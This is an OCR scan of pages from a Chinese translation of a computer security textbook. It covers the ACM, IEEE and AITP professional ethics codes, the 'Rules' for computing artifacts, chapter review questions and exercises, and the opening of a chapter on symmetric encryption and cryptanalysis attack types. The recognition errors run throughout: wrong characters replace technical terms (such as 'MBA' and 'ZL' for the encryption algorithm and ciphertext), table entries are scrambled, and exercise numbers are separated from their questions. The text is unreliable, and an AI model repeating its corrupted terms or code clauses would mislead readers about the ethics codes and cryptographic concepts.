我 们 用 三 个 具体 例子 来 解释 计算 机 专业 人 员 的 职业 道德 规范 的 概念 。ACM (国际 计算 机 
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会 ) 道德 规范 和 行业 操守 ( 见 图 19-6 )， 适 用 于 计算 机 科学 家 2。IEEE (电气 和 电子 工程 师 学 
a 的 道德 规范 ( 见 图 19-7 )， 适 用 于 计算 机 工程 师 和 其 他 种 类 的 电子 和 电子 工程 师 。AITP( 信 
息 技术 专业 协会 ， 从 前 的 数据 处 理 管理 协会 ) 的 行为 规范 ( 见 图 19-8 )， 适 用 于 计算 机 系统 和 
工程 的 管理 者 。 


1. 通常 的 道德 规则 


an 


44 父 正 ， 不 歧视 他 人 

1.5 尊重 产权 ， 包括 版 权 和 专利 
.1.6 正确 评价 知识 产权 

1.7 尊重 他 人 隐私 


1.8 保守 机 密 
2. 更 详细 的 职业 责任 
”2.1 在 职业 工作 的 过 程 和 产品 中 ,努力 实现 最 高 质量 、 EAE ， 
”2.2 取得 并 保持 行业 的 竞争 力 
2.3 了 解 并 遵守 与 职业 工作 相关 的 现行 法 律 
2.4 接受 并 提供 适当 的 专业 评论 
TE, 包括 分 析 可 能 存在 的 风险 
26 遵守 合同 、 协 议 ， 承 担 相应 的 责任 
2.7 提升 公众 对 计算 处 理 及 其 结果 的 理解 
2.8 只 有 在 授权 的 情况 下 ， 才 允 许 访问 计算 资源 和 通信 资源 
3. 机 构 领导 规则 
3.1 阐明 机 构成 员 的 社会 责任 并 鼓励 他 们 承担 这 些 责任 
3.2 对 人 员 和 资源 进行 管理 ， 以 便 设 计 和 创建 可 以 提升 工作 期 间 的 工作 质量 的 信息 系统 
“3.3 承认 并 支持 对 机 构 的 计算 资源 和 通信 资源 的 适当 使 用 和 授权 使 用 
i ur ad 
” “满足 了 这 些 需 玫 
3.5 阐明 和 支持 保护 用 户 和 其 他 受 计算 机 系统 影响 者 尊严 的 政策 
3.6 为 机 构成 员 学 习 计 算 机 系统 的 原则 和 局 限 性 创造 机 会 


4. 遵守 规范 
4.1 维护 和 促进 该 规范 的 各 项 原则 
4.2 违反 本 规范 被 视 为 自动 放弃 ACM 的 成 员 资 格 


图 19-6 ACM 道德 和 职业 行为 规范 
(Copyright © 1997, Association for Computing Machinery, Inc.) 





作为 EEE 的 成 员 ， 我 们 已 经 认识 到 我 们 的 技术 在 影响 世界 生活 质量 方面 的 重要 性 ， 并 且 愿 意 对 我 们 的 职业 、 
学 会 成 员 和 所 在 团体 承担 个 人 义务 。 以 最 高 的 道德 和 职业 操守 做 此 承诺 ， 并 同意 : 

1. 以 公众 安全 、 健 康 和 福利 作为 工程 决策 的 根本 出 发 点 ， 并 及 时 公布 可 能 危及 公众 或 者 环境 的 要 素 ; 

2. 在 任何 情况 下 都 要 避免 那些 真实 存在 的 或 者 可 察觉 的 利益 冲突 ， 并 且 当 它们 确实 出 现时 要 及 时 告知 受害 方 ; 
3. 在 发 表 声明 或 者 基于 现 有 数据 进行 评估 时 ， 要 诚信 务实 ; 

4. 拒绝 各 种 形式 的 贿赂 ; 

5. 提高 对 于 技术 本 身 、 技 术 的 适当 的 应 用 及 其 潜在 的 后 果 的 理解 ; 

“6. 保持 并 提升 自己 技术 的 竞争 力 ， 只 有 在 经 过 培训 和 实践 并 取得 资格 时 ， 或 者 在 相关 的 限制 完全 公开 时 ， 才 为 他 
“人 承 相 科 技 性 任务 ; o 

“7. 寻找、 接受 和 提供 技术 工作 方面 的 真诚 批评 ， 承 认 并 改正 错误 ， 正 确 评价 他 人 所 作出 的 贡献 ; 

8. 不 管 种 族 、 宗 教 、 性 别 、 残 疾 、 年 龄 或 者 国籍 等 因素 ， 公 平 对 待 所 有 人 ; 

9. 不 以 恶意 的 行为 影响 他 人 身体 、 财 产 、 名 誉 或 者 工作 ; 

10. 在 工作 中 ， 关 注 同事 和 工友 的 职业 发 展 ， 并 支持 他 们 遵守 该 道德 规范 。 


图 19-7 IEEE 道德 规范 
(Copyright © 2006, Institute of Electrical and Electronics Engineers ) 
















© 图 19-6 是 一 个 ACM 规范 的 精简 版 。 


按照 我 们 的 管理 职责 ， 我 将 : 


保持 个 人 知识 与 时 俱 进 ， 并且 确 保 在 需要 时 有 所 需 专业 技术 的 支持 。 

与 他 人 共享 我 的 知识 ， 并 且 尽 最 大 的 努力 为 管理 层 提 供 真 实 、 客 观 的 信息 。 
承担 我 工作 的 全 部 责任 。 

正确 行使 委托 给 我 的 权利 。 

不 误 传 或 者 保留 有 关 设 备 、 软 件 或 者 系统 性 能 的 信息 。 

不 使 用 缺乏 知识 或 者 经 验 的 他 人 。 


在 我 所 有 的 职业 关系 中 保持 诚实 。 

对 于 引起 我 注意 的 任何 非法 或 者 不 道德 的 行为 采取 适当 的 行动 。 然 而 ， 我 与 任何 人 的 争辩 仅 出 现在 我 有 理由 
相信 观点 的 真实 性 且 不 涉及 个 人 利益 时 。 

尽力 共享 我 的 专业 知识 。 

与 他 人 合作 来 理解 和 明确 问题 。 

未 经 过 明确 地 承认 和 授权 ， 不 得 使 用 或 者 参与 他 人 的 工作 。 

不 利用 缺乏 知识 或 者 无 经 验 的 他 人 为 自己 谋 利 。 


按照 我 对 同事 和 职业 的 义务 ， 我 将 : 


图 19-8 AITP 行为 标准 
(Copyright © 2006, Association of Information Technology Professionals ) 


这 些 规范 里 出 现 的 许多 共同 主题 包括 :( 1 ) 其 他 人 的 尊严 和 价值 ; (2 ) 人 的 正直 和 诚实 ; 
(3) 工作 责任 ; (4) 信息 的 机 密 性 ; (5) 公众 安全 、 健 康 和 福利 ; (6 ) 为 提高 行业 标准 而 参与 
行业 协会 ; 和 (7 ) 公共 知识 和 对 技术 的 使 用 权 是 与 社会 权利 等 价 的 这 一 观念 。 

这 三 个 规范 都 强调 行业 对 他 人 的 责任 ， 毕 竟 这 是 道德 的 中 心意 思 。 这 种 强调 人 而 不 是 机 
器 或 者 软件 的 做 法 是 很 好 的 。 然 而 ， 该 规范 很 少 详细 谈 到 技术 问题 ， 即 计算 机 和 信息 系统 。 这 
就 是 说 ， 这 种 方法 是 相当 普遍 的 ， 可 以 适用 于 大 多 数 行 业 ， 不 能 充分 反映 与 计算 机 和 IT 技术 
的 发 展 和 使 用 相关 的 特有 的 道德 问题 。 例 如 ， 这 些 规范 没有 明确 地 处 理 表 19-3 或 者 前 面 章节 
| PARK88 | 中 提出 的 问题 。 


19.4.4 规则 


目前 人 们 在 共同 努力 起 草 一 份 简要 的 、 关 于 在 计算 机 系统 开发 时 如 何 遵循 相关 道德 规范 的 
指导 意见 。 这 份 指导 性 文献 是 尽责 计算 特别 委员 会 (Ad Hoc Committee on Responsible Computing ) 
的 重要 成 果 ， 目 前 仍 在 修订 当中 。 任 何人 都 可 以 加 入 该 委员 会 并 提出 修改 建议 。 委 员 会 已 经 发 
布 了 一 份 定期 更 新 的 文档 ， 标 题 是 “计算 产品 的 道德 责任 ”( Moral Responsibility for Computing 
Artifacts)。 一 般 来 讲 ， 该 文档 就 是 我 们 所 说 的 “规则 ”SS。 目 前 该 规则 的 版 本 是 27， 它 反映 了 
目前 委员 会 关于 这 个 项 目的 想法 和 付出 的 努力 。 

术语 “计算 产品 ”(Computing Artifact) 指 的 是 包括 电脑 程序 在 内 的 任何 产品 。 它 包括 运行 
在 一 般 意 义 上 的 电脑 上 的 应 用 软件 ， 也 包括 那些 烧 录 在 硬件 上 的 ， 或 者 散人 到 机 械 设 备 、 机 丹 
人 、 手 机、 网 络 机 希 人 和 玩具 中 的 程序 ， 以 及 那些 在 不 止 一 台 机 占 上 分 布 运行 的 程序 。 该 规则 
也 适用 于 商业 软件 、 人 免费 软件 、 开 源 软 件 、 休 闲 软件 、 学 术 活 动 或 研究 工具 类 软件 。 

目前 ， 该 规则 内 容 如 下 : 

1. 设计 、 开 发 、 部 署 某 计算 产品 的 人 员 ， 对 该 产品 本 号 及 其 可 预见 的 影响 负 有 道德 方面 的 
责任 。 设 计 、 开 发 、 部 署 或 有 意 使 用 该 产品 作为 社会 技术 系统 的 一 部 分 的 其 他 人 员 应 该 分 担 此 
责任 。 

2. 计算 产品 的 责任 分 担 并 非 零 和 博弈 ( zero-sum game)。 个 人 应 承担 的 责任 并 不 会 因为 更 
多 的 人 参与 该 计算 产品 的 设计 、 开 发 、 部 署 和 使 用 而 简单 地 减 小 。 相 反 ， 个 人 的 责任 包括 对 产 


O 上 述 规则 的 最 新 版 本 可 以 在 此 网 站 查看 : https: // edocs.uis.edu / kmill2 / www / TheRules /。 
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品 的 行为 负责 ， 对 产品 部 署 后 所 带 来 的 影响 负责 ， 以 及 对 该 影响 合理 预见 的 程度 负责 。 

3. 有 意 使 用 特定 计算 产品 的 人 员 ， 对 使 用 该 产品 负 有 道德 上 的 责任 。 

4. 如 果 有 人 有 意 设 计 、 开 发 、 部 署 或 使 用 某 计 算 产 品 ， 仅 当 他 为 考虑 使 用 该 产品 的 社会 技 
术 场 景 付出 了 适当 努力 时 ， 他 才能 负责 任 地 去 设计 、 开 发 、 部 署 或 使 用 它 。 

5. 设计 、 开 发 、 部 署 、 促 销 或 评估 一 球 计 算 产 品 的 人 员 ， 在 产品 本 和 映 、 产 品 可 预见 的 影响 
和 产品 所 散人 的 社会 技术 系统 三 个 方面 不 应 该 显 式 或 隐 式 地 欺骗 产品 用 户 。 

.与 先前 讨论 的 行为 规范 相 比 ， 这 份 规则 的 条 目 很 少 并 且 更 为 一 般 化 。 人 们 希望 各 种 各 样 的 
参与 计算 机 系统 设计 和 开发 的 人 员 能 使 用 该 规则 。 该 规则 作为 一 个 有 用 的 指导 方针 已 经 得 到 了 
广泛 的 认可 ， 支持 者 包括 来 自 许 多 国家 的 学 者 、 医 生 、 计 算 机 科学 家 和 哲学 家 [MILL11]。 这 
份 规则 很 可 能 会 通过 计算 机 相关 的 专业 机 构 影响 道德 行为 规范 未 来 的 版 本 。 


195 关键 术语 、 复 习题 和 习题 


关键 术语 
code of conduce (行为 规范 ) ethics (道德 ) 
computer crime (计算 机 犯罪 ) infringement (侵权 ) 
consumer (消费 者 ) intellectual property (知识 产权 ) 
copyright (版 权 ) patent (专利 ) 
cybercrime (网 络 犯 罪 ) privacy (Bafi) 
Digital Millennium Copyright Act ( DMCA ,千年 数 rights holder (版 权 所 有 者 ) 
字 版 权 法 案 ) service provider (服务 提供 者 ) 
digital rights management (数字 版 权 管理 ) trademark (商标 ) 
复习 题 


19.1 根据 计算 机 在 犯罪 活动 中 所 起 的 作用 描述 计算 机 犯罪 的 分 类 。 

19.2 定义 三 种 类 型 的 财产 。 

19.3 ”定义 三 种 类 型 的 知识 产权 。 

19.4 在 声明 版 权时 ， 必 须 满足 哪些 基本 条 件 ? 

19.5 版 权 授 予 了 所 有 人 哪些 权利 ? 

19.6 简要 描述 千年 数字 版 权 法 案 。 

19.7 什么 是 数字 版 权 管理 ? 

19.8 ”描述 数字 版 权 管理 系统 的 用 户 的 主要 类 别 。 

19.9 欧盟 指令 中 包含 的 数据 保护 的 关键 原则 是 什么 ? 

19.10 通用 准则 中 关注 的 有 关 隐 私 的 问题 ， 与 正式 文档 、 标 准 和 机 构 策略 中 所 关注 的 问题 有 何不 同 ? 
19.11 在 管理 人 类 研究 中 使 用 电子 数据 方面 的 隐私 问题 时 ， 建 议 的 五 个 指导 方针 是 什么 ? 
19.12 职业 行为 规范 服务 于 什么 样 的 功能 实践 ? 

19.13 “规则 ”与 职业 行为 规范 有 何不 同 ? 


习题 


19.1 对 于 表 19-1 里 引用 的 每 一 类 网 络 犯罪 ， 指 出 它 是 否 属于 以 计算 机 为 目标 、 存 储 介 质 或 者 作为 通信 
工具 的 类 别 。 在 第 一 种 情况 中 ， 指 明 犯 罪 主 要 是 针对 数据 完整 性 、 系 统 完 整 性 、 数 据 机 密 性 、 隐 
私 还 是 可 用 性 的 攻击 。 

19.2 根据 表 19-2 回答 习题 19.1 中 的 问题 。 


19.3 


19.4 


19.5 


19.6 
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回顾 最 近 的 计算 机 犯罪 调查 结果 ， 例 如 CSI/FBI 或 者 AusCERT 的 调查 结果 。 调 查 结果 报告 中 犯罪 
的 类 型 有 哪些 变化 ”调查 的 结果 和 表 19-2 中 列 出 的 结果 之 间 有 什么 不 同 ? 

早期 一 个 关于 DCMA 的 有 和 争议 的 使 用 发 生 在 美国 的 一 个 案例 中 。 该 案例 是 由 美国 电影 协会 
(MPAA) 在 2000 年 引起 的 ， 它 试图 对 DeCSS 程序 和 其 派生 的 程序 的 发 行进 行 压制 。 这 些 程序 
可 以 用 在 商业 DVD 上 以 躲避 版 权 保 护 。 查 找 有 关 该 案件 的 简要 描述 和 结果 。 判 断 MPAA 压制 
DeCSS 解码 算法 的 细节 是 否 能 够 成 功 。 

考虑 一 个 像 苹果 公司 的 FairPlay 这 样 流行 的 DRM 系统 一 一 用 于 保护 从 iTunes 音乐 商店 购买 的 音频 
光碟 。 如 果 有 人 从 iTunes 商店 购买 了 一 张 由 EMI 这 样 的 唱片 公司 制作 的 某 音乐 家 的 光碟 。 请 确认 
哪个 公司 或 者 个 人 履行 了 图 19-2 中 显示 的 每 一 个 DRM 组 件 的 角色 。 

K 19-3 列 出 了 由 经 济 合 作 与 发 展 机 构 (OECD) 发 布 的 保密 指南 。 将 这 些 指南 与 欧盟 采取 的 数据 保 
护 指令 作 以 比较 。 


R 19-3 ”经济 合作 与 发 展 机 构 (OECD ) 关于 隐私 保护 和 信息 跨国 传送 的 指导 纲领 

收集 限制 (Collection limitation ) 

对 收集 个 人 数据 应 当 有 所 限制 并 且 任 何 这 样 的 数据 应 当 通过 合法 的 和 公正 的 手段 获取 ,在 适当 情况 下 ， 须 
征 得 数据 主体 的 同意 。 
数据 质量 (Data quality ) 

个 人 数据 应 当 与 使 用 它们 的 目的 有 关 ， 而 且 ， 在 该 目的 所 需 的 程度 上 ， 这 些 数据 应 该 是 准确 的 、 完 整 的 并 
且 是 保持 更 新 的 。 
目的 明确 (Purpose specification ) 

在 个 人 数据 开始 收集 之 前 ， 应 该 明确 其 目的 ， 并 且 在 随后 的 使 用 中 仅 限 于 实现 这 些 目的 ， 或 者 其 他 的 与 这 
些 目的 不 相抵 触 的 目的 ， 以 及 每 次 目的 变更 时 所 指定 的 目的 。 
使 用 局 限 (Use limitation ) 

除非 数据 主题 或 者 法 律 权 威 的 同意 ， 个 人 信息 不 应 该 被 泄露 ， 使 其 可 用 或 者 应 用 于 其 他 与 前 面 提 到 的 原则 
不 一 致 的 目的 。 
安全 保护 措施 (Security safeguards) 

个 人 信息 应 当 通 过 合理 的 安全 保护 措施 得 到 保护 ， 以 兔 造成 诸如 风险 类 的 损失 ,或 者 受到 未 经 授权 的 访 
问 、 破 坏 、 使 用 、 修 改 或 者 泄露 。 
公开 (Openness ) 

应 该 有 公开 与 个 人 数据 相关 的 开发 、 实 践 和 政策 的 一 般 性 策略 。 与 建立 个 人 数据 属性 、 使 用 的 主要 目的 以 
及 数据 控制 器 的 识别 和 通常 的 位 置 有 关 的 工具 应 该 是 随时 可 用 的 。 
个 人 参与 (Individual participation) 

个 人 应 当 拥 有 以 下 权利 : 

a. 有 权 从 数据 控制 占 获 得 与 自身 有 关 的 数据 ， 否 则 的 话 ， 有 权 确 认 该 数据 控制 器 是 否 持 有 与 其 相关 的 

数据 。 
b. 在 合理 的 时 间 内 ， 以 合理 的 方法 和 容易 理解 的 形式 ， 得 到 与 他 相关 的 信息 的 通知 ， 如 果 此 通知 需要 付 
费 ， 应 保证 费用 不 超过 适当 的 限度 。 

c. 如 果 以 上 (a) 和 (b) 提 到 的 要 求 被 拒绝 ， 拒 绝 方 必须 给 出 理由 ; 有 权 对 这 样 的 拒绝 提出 质疑 。 

d. 有 权 对 与 自己 有 关 的 信息 提出 质疑 ， 且 一 旦 质疑 成 功 ， 该 信息 必须 被 删除 、 订正、 补 完 或 者 修改 。 
责任 (Accountability ) 


数据 控制 器 应 该 负责 遵守 对 以 上 提 到 的 原则 有 影响 的 措施 。 


19.7 许多 国家 现在 要 求 收 集 个 人 信息 的 机 构 ， 发 布 它们 有 关 如 何 详细 地 处 理 和 使 用 这 些 个 人 信息 的 保 


19.8 


密 策 略 。 从 你 为 其 提供 详细 个 人 信息 的 机 构 中 获取 该 机 构 的 保密 策略 的 副本 。 将 这 个 保密 策略 与 
19.3 节 列 出 的 原则 进行 比较 。 该 策略 包含 了 全 部 这 些 原 则 吗 ? 

管理 简报 列 出 了 以 下 5 个 大 的 举措 来 提升 保密 性 。 将 这 些 建 议 与 文件 SecurityPolicy.pdf (在 
https://app.box.com/v/CompSec4e 可 得 ) 的 第 4 部 分 给 出 的 良好 实践 信息 隐私 权 标 准 作 比较 。 讨 


19.10 


19.11 


19.12 


19.13 


论 其 中 的 不 同 。 
1. 随处 可 见 的 和 一 贯 的 管理 层 支 持 。 
2. 建立 隐私 权 的 责任 。 隐 私 权 要 求 必 须 被 纳入 任何 处 理 个 人 可 识别 信息 (PIT) 的 职责 中 。 
3. 把 隐私 权 和 安全 纳入 到 系统 和 应 用 程序 的 生命 周期 中 。 这 包括 正式 的 隐私 冲突 评估 。 
4. 提供 持续 有 效 的 意识 和 培训 。 
5. 加 密 可 移动 的 个 人 可 识别 信息 (PII)。 这 包括 传输 和 移动 设备 。 
假设 你 是 一 个 大 型 机 构 某 部 门 的 中 级 系统 管理 员 。 你 试图 鼓励 你 的 用 户 拥 有 良好 的 口令 策略 ， 并 
且 经 常 运行 密码 破译 工具 来 检查 那些 正在 使 用 的 口令 是 否 容易 被 猜 到 。 你 已 经 意识 到 最 近 发 生 了 
黑客 破译 口令 的 行为 。 在 一 种 热情 的 驱使 下 ， 你 从 机 构 的 其 他 部 门 转移 密码 文件 并 企图 破解 它们 。 
令 你 害怕 的 是 ， 你 发 现在 你 过 去 曾经 工作 过 的 部 门 (但 现在 关系 已 经 相当 紧张 )， KAA 40% 的 口 
令 可 能 会 被 猿 中 (包括 那个 部 门 的 副 总 裁 的 口令 ， 其 口令 是 “ president!1”)。 你 悄悄 地 试探 了 以 前 
的 几 个 同事 并 且 暗 自 硕 望 情况 可 能 得 到 改善 。 一 两 个 星期 后 ， 你 再 次 转移 密码 文件 进行 分 析 和 希望 
情况 能 够 得 到 改善 。 然 而 ， 情 况 并 非 如 此 。 不 竺 的 是 ， 这 一 次 你 的 一 个 同事 注意 到 了 这 件 事 情 。 
作为 一 个 相当 “教条 ”的 人 ， 他 向 高 级 主管 告知 了 这 件 事情 ， 并 于 当晚 你 以 涉嫌 黑客 行为 而 被 妹 
捕 而 且 失 去 了 工作 。 你 做 错 了 什么 事 ? 简要 指出 你 可 能 用 来 为 你 自己 的 活动 辩护 的 证 据 。 参 考 
图 19-6 至 图 19-8 中 列 出 的 职业 行为 规范 。 
在 本 章 19.4 节 中 阐述 的 三 种 道德 规范 (ACM, IEEE 和 AITP) 都 包含 : 个 人 尊严 和 人 的 价值 ; 个 
人 诚信 ; 工作 责任 ; 信息 保密 ; 公共 安全 、 健 康 和 福利 ; 参与 专业 协会 ; 以 及 与 社会 能 力 相 关 的 
技术 知识 等 主题 。 为 每 个 主题 或 者 每 个 规范 创建 一 个 表格 ,显示 规范 中 阐明 主题 的 相关 条 球 。 
网 站 box.com/compsec4e 提供 了 1982 年 的 ACM 职业 行为 规范 的 副本 。 与 1997 年 的 ACM 职业 
行为 规范 UL 19-6) 作 以 比较 。 
a. 有 没有 1982 年 规范 里 有 而 1997 年 规范 里 没有 的 内 容 ? 给 出 没有 这 些 内 容 的 一 个 理由 。 
b. 有 没有 1997 年 规范 里 有 而 1982 年 规范 里 没有 的 内 容 ?” 给 出 没有 这 些 内 容 的 一 个 理由 。 
网 站 box.com/compsec4e 提供 了 1979 年 IEEE 道德 规范 的 副本 。 将 其 与 2006 年 IEEE 道德 规范 
( 见 图 19-7 ) 作 个 比较 。 
a. 有 没有 1979 年 规范 中 有 而 2006 年 规范 中 没有 的 内 容 ? 给 出 没有 这 些 内 容 的 一 个 理由 。 
b. 有 没有 2006 年 规范 里 有 而 1979 年 规范 里 没有 的 内 容 ? 给 出 没有 这 些 内 容 的 一 个 理由 。 
网 站 box.com/compsec3e 提供 了 1999 年 软件 工程 道德 和 专业 实践 规范 (版 本 $.2 )， 它 也 由 ACM/ 
IEEE-CS 联合 特种 部 队 推 荐 使 用 。 将 这 一 规范 与 本 章 (图 19-6 至 图 19-8 ) 提 及 的 三 种 规范 进行 比 
较 。 说 说 该 规范 与 书 中 提 及 的 三 种 规范 的 不 同 之 处 。 
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对 称 加 密 和 消 轧 机 蜜 性 





学 习 目标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 
解释 对 称 加 密 的 基本 原理 ; 

理解 Feistel 密码 结构 的 重要 作用 ; 
描述 DES 的 结构 和 作用 ; 

区 别 2 密 钥 和 3 密 钥 3DES; 

描述 AES 的 结构 和 作用 ; 

比较 和 区 分 流 密码 和 分 组 密码 ; 

区 分 主要 的 分 组 密码 的 工作 模式 ; 
讨论 密 钥 分 发 中 的 问题 。 


对 称 加 密 ， 也 称 传统 加 密 、 私 钥 或 单 钥 加 密 ， 是 20 世纪 70 年 代 后 期 公 钥 密码 产生 之 前 
唯一 的 一 种 加 密 技 术 。 现 在 它 仍 是 两 种 类 型 的 加 密 中 使 用 最 广泛 的 一 种 。 

本 章 首先 介绍 对 称 加 密 过 程 的 一 般 模 型 ， 了 解 传 统 加 密 算 法 的 使 用 环境 。 然 后 讨论 三 个 重 
要 的 分 组 加 密 算法 : DES, =E DES 和 AES。 接 下 来 ,介绍 对 称 流 加 密 并 描述 现在 广泛 使 用 
的 流 密码 RC4。 最 后 讨论 这 些 算 法 在 实现 机 密 性 中 的 应 用 。 


20.1 ”对称 加 密 原理 


这 里 ， 我 们 应 该 再 看 一 下 在 2.1 节 所 介绍 的 内 容 。 回 忆 一 下 对 称 加 密 方 案 的 5 个 组 成 部 分 
( 见 图 2-1 ): 
e 明文 (plaintext): 作为 算法 的 输入 ， 是 原始 可 理解 的 消息 和 数据 。 
e MBA (encryption algorithm): 加 密 算 法 对 明文 进行 各 种 代 换 和 变换 。 
e 密 钥 (secret key): 密 钥 也 是 加 密 算 法 的 输入 。 算 法 所 用 的 特定 的 代 换 和 变换 依赖 于 
密 钥 。 
e ZL (ciphertext): 作为 算法 的 输出 ， 看 起 来 完全 随机 而 杂乱 的 数据 ， 依 赖 于 明文 和 密 
钥 。 对 于 给 定 的 消息 ,不 同 的 密 钥 将 产生 不 同 的 密 文 。 
605 e 解密 算法 (decryption algorithm): 本 质 上 是 加 密 算 法 的 逆 ， 输 入 密 文 和 密 钥 可 以 用 解密 
i 算法 恢复 明文 。 


20.1.1 密码 编码 学 


密码 编码 系统 通常 依据 以 下 三 个 角度 进行 划分 : 

1. 将 明文 转换 为 密 文 的 运算 类 型 。 所 有 的 加 密 算 法 都 是 基于 两 个 原理 : 代 换 和 置换 。 代 换 
是 将 明文 中 的 每 个 元 素 (如 位 、 字 母 、 位 组 和 字母 组 等 ) 映射 成 另 一 个 元 素 ; 置换 是 将 明文 中 
元 素 重 新 排列 。 上 述 运算 的 基本 要 求 是 不 允许 信息 丢失 (也 就 是 说 ， 所 有 的 运算 都 是 可 逆 的 )。 





日 ” 公 钥 密码 于 1976 年 第 一 次 在 公开 文献 中 提出 ,但 是 NSA (National Security Agency) 宣称 他 们 几 年 前 就 发 现 
了 这 种 加 密 体制 。 
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大 多 数 密码 体制 ， 也 称 为 乘积 系统 ， 都 使 用 了 多 层 代 换 和 置换 。 

2. 所 用 密 钥 的 数目 。 如 果 发 送 方 和 接收 方 使 用 相同 的 密 钥 ， 这 种 体制 就 称 为 对 称 加 密 、 单 
钥 加 密 或 传统 加 密 。 如 果 发 送 方 和 接收 方 使 用 不 同 的 密 钥 ， 这 种 体制 则 称 为 非 对 称 加 密 、 双 钠 
加 密 或 公 角 加 密 。 

3. 处 理 明 文 的 方式 。 分 组 密码 每 次 处 理 一 个 输入 分 组 ， 相 应 地 输出 一 个 输出 分 组 。 而 流 密 
码 则 是 连续 地 处 理 输入 元 素 ， 每 次 输出 一 个 元 素 。 


20.1.2 ”密码 分 析 


试图 发 现 明 文 和 密 钥 的 过 程 称 为 密码 分 析 。 密 码 分 析 者 所 用 的 策略 是 基于 加 密 方案 的 特征 
和 他 所 能 利用 的 信息 的 。 

表 20-1 概括 了 密码 分 析 攻 击 的 几 种 类 型 ， 它 们 都 是 基于 密码 分 析 者 所 知道 的 信息 数量 的 。 
RPR (ciphertext only) 攻击 难度 最 大 。 在 有 些 情况 下 ， 敌 手 其 至 不 知道 加 密 算法 ,但 我 
们 通常 假设 敌手 知道 。 这 种 情况 下 ,一 种 可 能 的 攻击 是 试 遍 所 有 可 能 密 钥 的 蛮 力 攻击 ( brute- 
force)。 如 果 密 钥 空 间 非常 大 ， 这 种 攻击 方法 就 不 太 实 际 了 。 因 此 攻击 者 必须 依赖 密 文 本 身 的 分 
析 ， 而 这 一 般 要 运用 各 种 统计 方法 。 使 用 这 种 方法 ， 敌 手 对 隐 含 的 明文 类 型 必须 要 有 所 了 解 ， 
比如 ， 明 文 是 英文 文本 还 是 法 文 文本 ,是 EXE 可 执行 文件 还 是 Java 源 列表 文件 、 会 计 文件 ， 
SESE 

R 20-1 基于 加 密 信息 的 攻击 类 型 


攻击 类 型 密码 分 析 者 已 知 的 信息 
© 加密 算法 

准 密 文 攻击 。 要 解密 的 密 广 
。 加 密 算法 

已 知 明文 攻击 。 要 解密 的 密 文 
。 用 同一 密 钥 加 密 的 一 个 或 多 个 明文 一 密 文 对 
。 加 密 算法 

选择 明文 攻击 。 要 解密 的 密 文 
。 分 析 者 任意 选择 的 明文 ， 和 用 (与 待 解密 密 文 ) 同一 密 钥 加 密 的 对 应 密 文 
。 加 密 算法 

选择 密 文 攻击 。 要 解密 的 密 文 
。 分 析 者 有 目的 地 选择 的 一 些 密 文 ， 用 (与 待 解密 密 文 ) 同一 密 钥 解密 的 对 应 明文 
s 加 密 算法 

选择 文本 攻击 ”要 解密 的 密 文 


© 分 析 者 任意 选择 的 明文 ， 用 (与 待 解密 密 文 ) 同一 密 钥 加 密 的 对 应 明文 
。 分 析 者 有 目的 地 选择 的 一 些 密 文 ,用 (与 竺 解密 密 文 ) 同一 密 钥 解密 的 对 应 密 文 


唯 密 文 攻击 是 最 容易 防范 的 ， 因 为 攻击 者 拥有 的 相关 信息 量 最 少 。 不 过 ， 在 很 多 情况 下 ， 
分 析 者 可 以 得 到 更 多 信息 。 分 析 者 可 以 捕获 到 一 段 或 更 多 的 明文 信息 及 相应 的 密 文 ， 也 可 以 知 
道 某 段 明文 信息 的 格式 等 。 比 如 ， 按 照 Postscript 格式 加 密 的 文件 总 是 以 相同 的 格式 开头 ， 电 
子 文 票 转账 信息 往往 有 标准 化 的 文件 头 或 者 标志 等 。 这 些 都 是 已 知 明文 攻击 的 例子 。 拥 有 这 些 
知识 的 分 析 者 就 可 以 从 转换 明文 的 方法 和 人手 来 推导 出 密 钥 。 

与 已 知 明 文 攻击 相关 的 是 可 能 词 ( probable-word) 攻击 。 如 果 攻 击 者 处 理 的 是 一 般 散 文 信 
奶 ， 他 可 能 对 信息 的 内 容 一 无 所 知 。 但 是 如 果 处 理 的 是 一 些 特定 信息 ， 他 就 可 能 知道 其 中 的 部 
分 信息 。 例如， 对 于 一 个 完整 的 正在 传输 的 会 计 文 件 ， 攻 击 者 可 能 知道 放 在 文件 最 前 面 的 某 些 
密 钥 词 。 再 比如 ， 茶 个 公司 开发 的 程序 源 代码 可 能 含有 该 公司 的 版 权 信息 ， 并 放 在 某 个 标准 
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位 置 。 

如 果 分 析 者 能 够 通过 某 种 方式 ， 让 发 送 方 在 发 送 的 信息 中 插入 一 段 由 他 选择 的 信息 ， 那 么 
选择 明文 攻击 就 有 可 能 实现 。 一 般 来 说 ， 如 果 分 析 者 有 办 法 选择 明文 加 密 ， 那 么 他 将 故意 选取 
那些 最 有 可 能 恢复 出 密 钥 的 数据 。 

表 20-1 还 列 出 了 另外 两 种 类 型 的 攻击 方法 : 选择 密 文 攻击 和 选择 文本 攻击 。 它 们 在 密码 
分 析 中 很 少 用 到 ， 但 不 失 为 两 种 较 好 的 可 能 的 攻击 方法 。 

只 有 相对 比较 弱 的 算法 才 抵挡 不 住 唯 密 文 攻击 。 一 般 情 况 下 ,加密 算 法 起 码 要 能 经 受 得 住 
已 知 明 文 攻击 才 行 。 

如 果 密 文 是 由 满足 以 下 一 条 或 全 部 标准 的 体制 产生 的 ， 那 么 该 加 密 体制 是 计算 上 安全 的 。 

© 破译 密码 的 代价 超出 密 文 信息 的 价值 。 

。 破译 密码 的 时 间 超 出 密 文 信息 的 有 效 生命 期 。 

不 幸 的 是 ， 成 功 地 分 析出 密 文 所 需要 的 工作 量 是 很 难 估计 的 。 但 是 ， 假 设 算法 没有 内 在 的 
数学 方面 的 弱点 ， 而 且 已 经 指出 是 利用 蛮 力 攻击 ， 则 此 时 我 们 可 以 对 代价 和 时 间 做 出 合理 的 
估计 。 

蛮 力 攻击 是 试 遍 所 有 的 可 能 密 钥 ， 直 到 
有 一 个 合法 的 密 钥 能 够 把 密 文 还 原 成 明文 的 攻 
击 方法 。 平 均 来 说 ， 要 获得 成 功 必须 尝试 所 有 FUE 
可 能 密 钥 的 一 半 。 这 类 攻击 在 2.1 节 中 已 做 过 


讨论 。 
20.1.3 Feistel 密码 结构 


1973 年 IJBM 公 司 的 Horst Feistel[FEIS73] 
第 一 次 描述 了 许多 对 称 加 密 算法 包括 DES 的 一 
种 结构 ， 如 图 20-1 所 示 。 加 密 算 法 的 输入 是 长 ie 
为 2w 位 的 明文 组 和 密 钥 大。 明文 组 被 分 为 两 
部 分 : Lo 和 Ro。 这 两 半 部 分 数据 经 过 n 轮 迭 代 
